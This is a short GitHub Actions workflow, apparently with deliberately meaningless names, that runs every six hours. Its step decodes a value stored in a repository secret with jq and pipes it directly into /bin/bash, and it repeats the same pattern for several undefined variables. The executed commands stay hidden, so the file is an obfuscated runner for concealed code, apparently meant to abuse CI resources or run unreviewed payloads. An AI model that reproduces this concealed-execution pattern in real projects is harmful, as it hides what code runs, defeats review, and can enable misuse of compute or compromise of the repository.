name: wangtianyiy

on:
  workflow_dispatch:
  schedule:
    - cron: '37 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wangtianyiy
        env:
          liy12850: ${{ secrets.liy12850 }}
        run: |
          echo $liy12850 | jq -r .heie326 | /bin/bash
          echo $uppyz4439 | jq -r .qwdfx0 | /bin/bash
          echo $knu803 | jq -r .hejer120 | /bin/bash
          echo $sp834 | jq -r .mtdof1017 | /bin/bash
          echo $pskf6034 | jq -r .xac45 | /bin/bash
          echo $yyumt014 | jq -r .sm964 | /bin/bash

